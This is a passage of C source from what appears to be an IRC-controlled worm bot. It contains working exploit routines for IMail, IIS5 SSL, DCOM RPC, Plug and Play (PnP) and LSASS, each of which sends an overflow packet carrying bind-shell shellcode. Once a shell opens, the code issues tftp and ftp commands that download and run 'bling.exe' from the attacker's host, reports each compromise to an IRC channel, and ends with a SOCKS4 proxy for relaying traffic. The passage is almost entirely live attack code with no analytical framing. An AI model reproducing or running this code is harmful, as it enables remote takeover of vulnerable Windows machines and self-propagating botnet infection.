iRemoteTarget = 6;
else if (strstr(szBanner,"IMail 7.15"))
iRemoteTarget = 6;
else if (strstr(szBanner,"IMail 8.00"))
iRemoteTarget = 7;
else if (strstr(szBanner,"IMail 8.01"))
iRemoteTarget = 7;
else if (strstr(szBanner,"IMail 8.02"))
iRemoteTarget = 7;
else if (strstr(szBanner,"IMail 8.03"))
iRemoteTarget = 7;
else if (strstr(szBanner,"IMail 8.04"))
iRemoteTarget = 8;
else if (strstr(szBanner,"IMail 8.05"))
iRemoteTarget = 9;
else if (strstr(szBanner,"IMail 8.10"))
iRemoteTarget = 10;
else if (strstr(szBanner,"IMail 8.11"))
iRemoteTarget = 12;
else if (strstr(szBanner,"IMail 8.12"))
iRemoteTarget = 13;
else if (strstr(szBanner,"IMail 8.13"))
iRemoteTarget = 14;
else if (strstr(szBanner,"IMail 8.14"))
iRemoteTarget = 14;
else if (strstr(szBanner,"IMail 8.15"))
iRemoteTarget = 15;
else
iRemoteTarget = -1;
if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"Banner for %s is %s, iRemoteTarget is %d",exinfo.ip,szBanner,iRemoteTarget);Sleep(1500);
memcpy(szImailPacket + 12, bindshell, ibindsize -1);
if (iRemoteTarget == -1) return FALSE;
if (pImailTargets[iRemoteTarget].iSEHAddress == 0)
memcpy(szImailPacket + 700, &pImailTargets[iRemoteTarget].lOffset, 4);
else
if (pImailTargets[iRemoteTarget].iSEHAddress == 1)
memcpy(szImailPacket + 692, &pImailTargets[iRemoteTarget].lOffset, 4);
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Crafting Malicious Packet for %s",exinfo.ip);Sleep(1500);
if(fsend(sSocket, szImailPacket, sizeof(szImailPacket), 0) == SOCKET_ERROR)
return FALSE;
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Malicious packet for %s sent",exinfo.ip);Sleep(1500);
fclosesocket(sSocket);
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Socket Closed for %s",exinfo.ip);Sleep(1500);
if (ConnectShell(exinfo,bindport))
{
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
exploit[exinfo.exploit].stats++;
} else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
return FALSE;
}
BOOL IIS5SSL(EXINFO exinfo)
{
char buffer[IRCLINE];
char request[]="\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";
unsigned long XOR=0xffffffff;
unsigned long offsets[] = {
0x6741a1cd, // Win2K SP0
0x6741a199, // Win2K SP1
0x6741a426, // Win2K SP2
0x67419e1d, // Win2K SP3
0x67419ce8, // Win2K SP4
0x0ffb7de9, // WinXP SP0
0x0ffb832f // WinXP SP1
};
BOOL bRet = FALSE;
unsigned char *badbuffer=(unsigned char*)malloc(347);
memset(badbuffer, 0, 347);
unsigned char *p=badbuffer;
memcpy(p, request, sizeof(request));
p+=sizeof(request)-1;
strcat((char*)p, jumper);
strcat((char*)p, bind_shell_code);
SOCKET sSock;
if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
SOCKADDR_IN ssin;
// FIX ME: since i didnt found a way to determine the remote OS, i
// placed this all together in a loop. this aint the best way
// i'm sure about that
for (int i=0; i < (sizeof(offsets) / sizeof(LPTSTR)); i++) {
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons(exinfo.port);
if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
offsets[i]^=XOR;
strncat((char*)p, (char*)&offsets[i], 4);
strcat((char*)p, shellcode);
if (fsend(sSock, (char *)&badbuffer, strlen((char *)&badbuffer), 0)) {
Sleep(1000);
fclosesocket(sSock);
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons(1981);
if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin))) {
char cmd_buff[400];
#ifndef NO_TFTPD
_snprintf(cmd_buff, sizeof (cmd_buff),
"tftp -i %s get %s\r\n",
GetIP(exinfo.sock),filename, filename);
#endif
#ifndef NO_FTPD
_snprintf(cmd_buff, sizeof (cmd_buff),
"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
GetIP(exinfo.sock),FTP_PORT);
#endif
if(frecv(exinfo.sock, buffer, sizeof(buffer), 0) > 0) {
Sleep(500);
if(fsend(sSock,(char*)cmd_buff, strlen(cmd_buff),0) > 0) {
fclosesocket(sSock);
bRet = TRUE;
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
break;
}
}
}
}
}
fclosesocket(sSock);
}
}
return (bRet);
}
BOOL dcom(EXINFO exinfo)
{
char sendbuf[IRCLINE];
if (exinfo.port == 445) {
NETRESOURCEW nr;
if (!ConnectViaNullSession(exinfo.ip, &nr))
return FALSE;
else {
char szPipePath[MAX_PATH];
sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", exinfo.ip);
HANDLE hFile = CreateFile(szPipePath, GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
CloseNullSession(exinfo.ip);
return FALSE;
}
// sprintf(sendbuf, "[dcom]: Connected to pipe \\\\%s\\pipe\\epmapper", exinfo.ip);
// irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
int TargetOS = FpHost(exinfo.ip, FP_PORT5K);
// get shellcode
DWORD reqbufsize;
char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, TRUE);
if (!reqbuf) {
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
return FALSE;
}
unsigned long lWritten;
char *szInBuf = (char *)malloc(100000);
memset(szInBuf, 0, 100000);
// send the bind string
DWORD dwRead;
TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL);
if (szInBuf[2] != 0x0C) {
free(szInBuf);
free(reqbuf);
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
return FALSE;
}
// send the evil request
if (!WriteFile(hFile, reqbuf, reqbufsize, &lWritten, 0)) {
free(szInBuf);
free(reqbuf);
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
return FALSE;
}
BOOL Result = ReadFile(hFile, szInBuf, 10000, &dwRead, NULL);
free(reqbuf);
free(szInBuf);
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
if (Result == TRUE) {
return FALSE;
}
}
} else { // port 135 and others
int TargetOS = FpHost(exinfo.ip, FP_RPC);
if (TargetOS == OS_WINNT)
return FALSE;
// get a funky fresh socket
SOCKET sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP);
if (sSocket == SOCKET_ERROR)
return FALSE;
// fill in sockaddr and resolve the host
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)exinfo.port);
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
// get shellcode
DWORD reqbufsize;
char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, FALSE);
if (!reqbuf) {
fclosesocket(sSocket);
return FALSE;
}
// connect to the server
int iErr = fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin));
if (iErr == -1) { // connect failed, exit
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
// send the bind string
if (fsend(sSocket, bindstr, sizeof(bindstr)-1, 0) == SOCKET_ERROR) {
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
// read reply
char recvbuf[4096];
frecv(sSocket, recvbuf, 4096, 0);
// Send the evil request
if (fsend(sSocket, reqbuf, reqbufsize, 0) == SOCKET_ERROR) {
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
// read reply
if (frecv(sSocket, recvbuf, 4096, 0) == SOCKET_ERROR) {
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
free(reqbuf);
// Close the socket
fclosesocket(sSocket);
}
sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip);
for (int i=0; i < 6; i++) {
if (searchlog(sendbuf)) {
sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
break;
}
Sleep(5000);
}
return TRUE;
}
BOOL PnP( char *target, void* conn, EXINFO exinfo, int OffNum )
{
SOCKADDR_IN addr;
int len;
int sockfd;
unsigned short smblen;
char tmp[1024];
unsigned char packet[4096];
unsigned char *ptr;
char recvbuf[4096];
IRC* irc=(IRC*)conn;
BOOL success=FALSE;
char* thisTarget;
int pnpbindsize=405;
int TargetOS, Target;
char* tOS="";
WSADATA wsa;
fWSAStartup(MAKEWORD(2,0), &wsa);
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE;
thisTarget = exinfo.ip;
TargetOS=FpHost(thisTarget,FP_NP);
if (TargetOS==OS_UNKNOWN)
TargetOS=FpHost(thisTarget,FP_SMB);
if (TargetOS == OS_WINNT){
Target=OS_WINNT;
success=FALSE;
}else if (TargetOS==OS_WINXP){
Target=OS_WINXP;
success=FALSE;
}else if (TargetOS==OS_WIN2K){
Target=OS_WIN2K;
success=TRUE;
}else{
success=FALSE;
}
ZeroMemory(&addr,sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = finet_addr(thisTarget);
addr.sin_port = fhtons((unsigned short)exinfo.port);
if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) return FALSE;
if (fsend(sockfd, (const char *)SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (const char *)SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if (len <= 10) return FALSE;
if (fsend(sockfd, (const char *)SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
ptr = packet;
memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
ptr += sizeof(SMB_TreeConnectAndX)-1;
sprintf(tmp,"\\\\%s\\IPC$",thisTarget);
convert_name((char *)ptr, tmp);
smblen = strlen(tmp)*2;
ptr += smblen;
smblen += 9;
memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
ptr += sizeof(SMB_TreeConnectAndX_)-1;
smblen = ptr-packet;
smblen -= 4;
memcpy(packet+3, &smblen, 1);
if (fsend(sockfd, (char *)packet, ptr-packet, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (char *)SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (char *)SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
// nop
ptr = packet;
memset(packet, '\x90', sizeof(packet));
// Start prepare header -- dETOX mod --
memcpy(RPC_call + 260, Offsets[OffNum], 4);
// header & offsets
memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
ptr += sizeof(RPC_call)-1;
// shellcode
unsigned short port;
port = fhtons(bindport)^(USHORT)0x9999;
memcpy(&bindshell[176],&port,2);
memcpy(ptr,bindshell,pnpbindsize-1);
// end of packet
memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
RPC_call_end,
sizeof(RPC_call_end)-1);
// sending...
if (fsend(sockfd, (char *)packet, 2196, 0) < 0) return FALSE;
frecv(sockfd, recvbuf, 4096, 0);
if (!exinfo.silent && exinfo.verbose){
switch(Target){
case 1:
tOS="WINNT";
break;
case 2:
tOS="WIN2K";
break;
case 3:
tOS="WINXP";
break;
default:
tOS="UNKNOWN/2K3/LINUX";
break;
}
irc->privmsg(target,"%s %s: Target OS is %s... (%s).", scan_title, exploit[exinfo.exploit].name, tOS, exinfo.ip);
}
// if(success){
Sleep(2000);
if (ConnectShell(exinfo,bindport))
{
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
exploit[exinfo.exploit].stats++;
}
else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
// }
return TRUE;
}
BOOL lsass2(EXINFO exinfo)
{
int i, targetx, len, targetxOS;
char hostipc[40];
char hostipc2[40*2];
char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char req4u[sizeof(reqx4)+20];
char screq[BUFSIZE+sizeof(reqx7)+1500+440];
char screq2k[4348+4060];
char screq2k2[4348+4060];
char recvbuf[1600];
char strasm[]="\x66\x81\xEC\x1C\x07\xFF\xE4";
char strBuffer[BUFSIZE];
char buffer[IRCLINE], cmd_buff[400];
char smblen;
char unclen;
unsigned short port;
SOCKET sSocket, bSocket;
SOCKADDR_IN ssin, bsin;
targetxOS = FpHost(exinfo.ip, FP_RPC);
if ((targetxOS == OS_UNKNOWN) || (targetxOS == OS_WINNT))
return FALSE;
if (targetxOS == OS_WINXP)
targetx = 0;
else if (rand() % 10)
targetx = 1;
else
targetx = 2;
_snprintf(hostipc, sizeof(hostipc),"\\\\%s\\ipc$", exinfo.ip);
for (i=0; i<40; i++) {
hostipc2[i*2] = hostipc[i];
hostipc2[i*2+1] = 0;
}
memcpy(req4u, reqx4, sizeof(reqx4)-1);
memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);
memcpy(req4u+47+strlen(hostipc)*2, reqx4+87, 9);
smblen = 52+(char)strlen(hostipc)*2;
memcpy(req4u+3, &smblen, 1);
unclen = 9 + (char)strlen(hostipc)*2;
memcpy(req4u+45, &unclen, 1);
port = fhtons(LSASS_BSPORT)^(USHORT)0x9999;
memcpy(&bindshell[176], &port, 2);
if ((targetx == 1) || (targetx == 2)) {
memset(buf, NOP, LEN);
//memcpy(&buf[2020], "\x3c\x12\x15\x75", 4);
memcpy(&buf[2020], &ttargetx[targetx].jmpaddr, 4);
memcpy(&buf[2036], &bindshell, strlen(bindshell));
memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4);
memcpy(&buf[2844], &ttargetx[targetx].jmpaddr, 4); // jmp ebx addr
//memcpy(&buf[2844], "\x3c\x12\x15\x75", 4); // jmp ebx addr
memcpy(&buf[2856], &bindshell, strlen(bindshell));
for (i=0; i<LEN; i++) {
sendbuf[i*2] = buf[i];
sendbuf[i*2+1] = 0;
}
sendbuf[LEN*2]=0;
sendbuf[LEN*2+1]=0;
memset(screq2k, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);
memset(screq2k2, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);
} else {
memset(strBuffer, NOP, BUFSIZE);
memcpy(strBuffer+160, bindshell, strlen(bindshell));
memcpy(strBuffer+1980, strasm, strlen(strasm));
*(long *)&strBuffer[1964]=ttargetx[targetx].jmpaddr;
}
memset(screq, 0x31, BUFSIZE+sizeof(reqx7)+1500);
if ((sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP)) == SOCKET_ERROR)
return FALSE;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)exinfo.port);
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
if (fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin)) == -1) {
fclosesocket(sSocket);
return FALSE;
}
if (fsend(sSocket, reqx1, sizeof(reqx1)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx2, sizeof(reqx2)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx3, sizeof(reqx3)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, req4u, smblen+4, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx5, sizeof(reqx5)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx6, sizeof(reqx6)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if ((targetx == 1) || (targetx == 2)) {
memcpy(screq2k, reqx8, sizeof(reqx8)-1);
memcpy(screq2k+sizeof(reqx8)-1, sendbuf, (LEN+1)*2);
memcpy(screq2k2, reqx9, sizeof(reqx9)-1);
memcpy(screq2k2+sizeof(reqx9)-1, sendbuf+4348-sizeof(reqx8)+1, (LEN+1)*2-4348);
memcpy(screq2k2+sizeof(reqx9)-1+(LEN+1)*2-4348-sizeof(reqx8)+1+206, shitx3, sizeof(shitx3)-1);
if (fsend(sSocket, screq2k, 4348, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, screq2k2, 4060, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
} else {
memcpy(screq, reqx7, sizeof(reqx7)-1);
memcpy(screq+sizeof(reqx7)-1, &strBuffer[0], BUFSIZE);
memcpy(screq+sizeof(reqx7)-1+BUFSIZE, shitx1, 9*16);
screq[BUFSIZE+sizeof(reqx7)-1+1500-304-1] = 0;
if (fsend(sSocket, screq, BUFSIZE+sizeof(reqx7)-1+1500-304, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
}
len = frecv(sSocket, recvbuf, 1600, 0);
if ((bSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
memset(&bsin, 0, sizeof(bsin));
bsin.sin_family = AF_INET;
bsin.sin_port = fhtons(LSASS_BSPORT);
bsin.sin_addr.s_addr = finet_addr(exinfo.ip);
if (fconnect(bSocket, (LPSOCKADDR)&bsin, sizeof(bsin)) == -1) {
fclosesocket(sSocket);
fclosesocket(bSocket);
return FALSE;
}
if (frecv(bSocket, recvbuf, 1600, 0) > 0) {
Sleep(500);
_snprintf(cmd_buff, sizeof(cmd_buff),
// "tftp -i %s get %s&%s&exit\n", GetIP(exinfo.sock), filename, filename);
"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
GetIP(exinfo.sock),FTP_PORT);
if (fsend(bSocket, cmd_buff, strlen(cmd_buff), 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
fclosesocket(bSocket);
return FALSE;
}
fclosesocket(sSocket);
fclosesocket(bSocket);
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent)
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
return TRUE;
} else
return FALSE;
}
DWORD WINAPI Socks4ClientThread(LPVOID param)
{
SOCKS4 socks4 = *((SOCKS4 *)param);
SOCKS4 *socks4p = (SOCKS4 *)param;
socks4p->cgotinfo = TRUE;
int threadnum = socks4.cthreadnum;
SOCKS4HEADER hdr;
TIMEVAL timeout;
timeout.tv_sec = 5;
timeout.tv_usec = 0;
fd_set fd;
FD_ZERO(&fd);
FD_SET(threads[threadnum].sock, &fd);
if (fselect(0, &fd, NULL, NULL, &timeout) == 0) {
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
if (frecv(threads[threadnum].sock, (char *)&hdr, sizeof(hdr), 0) <= 0) {
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
if (hdr.vn != 4 || hdr.cd != SOCKS4_CONNECT) {
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
// FIX ME: do a userid (hdr.userid) check here if you wish to use simple auth (needs testing)
if (socks4.userid[0] != '\0') {
if (strcmp(hdr.userid, socks4.userid) != 0) {
addlogv("[SOCKS4]: Authentication failed. Remote userid: %s != %s.", hdr.userid, socks4.userid);
hdr.vn = 0;
hdr.cd = SOCKS4_REJECT_USERID;
memset(&hdr.userid, 0, 1024);
fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
}
SOCKADDR_IN tsin;
memset(&tsin, 0, sizeof(tsin));
tsin.sin_family = AF_INET;
tsin.sin_port = hdr.destport;
tsin.sin_addr.s_addr = hdr.destaddr;
SOCKET tsock;
if ((tsock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) {
addlogv("[SOCKS4]: Error: Failed to open socket(), returned: <%d>.", fWSAGetLastError());
hdr.vn = 0;
hdr.cd = SOCKS4_REJECT;
memset(&hdr.userid, 0, 1024);
fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
if (fconnect(tsock, (LPSOCKADDR)&tsin, sizeof(tsin)) == SOCKET_ERROR) {
addlogv("[SOCKS4]: Error: Failed to connect to target, returned: <%d>.", fWSAGetLastError());
hdr.vn = 0;
hdr.cd = SOCKS4_REJECT;
memset(&hdr.userid, 0, 1024);
fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
hdr.vn = 0;
hdr.cd = SOCKS4_GRANT;
memset(&hdr.userid, 0, 1024);
fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);
TransferLoop(tsock, threads[threadnum].sock);
fclosesocket(tsock);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
